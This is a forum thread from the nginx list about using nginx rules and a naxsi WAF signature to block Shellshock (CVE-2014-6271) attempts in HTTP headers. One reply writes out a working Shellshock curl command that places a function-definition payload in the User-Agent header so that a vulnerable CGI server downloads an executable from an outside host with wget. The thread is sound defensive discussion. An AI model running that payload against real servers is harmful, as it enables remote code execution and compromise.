Shellshock protection using nginx?

Hi

I have seen eg. Netscaler response policy which can detect if someone is
trying shellshock bug using http headers.

I am using nginx as reverse proxy so is there good way to make a similar
protection using nginx features?
eg. checking http headers and drop/return 404 if shellshock code is
detected?

Regards,
Pekka Panula

Untested but should work;

between http {}
map $request $shellshockblock {
default 0;
~*:; 1;
~ping 1;
~
/bash 1;
}

inside location {} if ($shellshockblock) { return 412; }

Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,253553,253554#msg-253554

curl -k -H ‘User-Agent: () { somedummytext; }; /usr/bin/wget -O
/tmp/nastyexe http://myserver.com/nastyexe
https://target.com/cgi-bin/hi

:smiley:

if, you should try to match for (regex-pattern) “() {”
#since this must be written like this;
an additional space between “() {” would render the exploiut
non-functional

further more: you are missing all headers; attacks i’ve seen so far
worked
angainst

  • UA
  • cookies
  • custom headers

customized attacks might work via POST-BODY too, but this is yet not
confirmed

Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,253553,253557#msg-253557

hi pekka,

since the attack, esp. against CGI, is possible through (custom)
headers/cookies etc
you’d need some waf-functionalities (afaik)

naxsi, an nginx-based waf, has a signature for this since wednesday

MainRule “str:() {” “msg:Possible Remote code execution through Bash
CVE-2014-6271” “mz:BODY|HEADERS” “s:$ATTACK:8” id:42000393 ;

http://blog.dorvakt.org/2014/09/ruleset-update-possible-remote-code.html

Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,253553,253555#msg-253555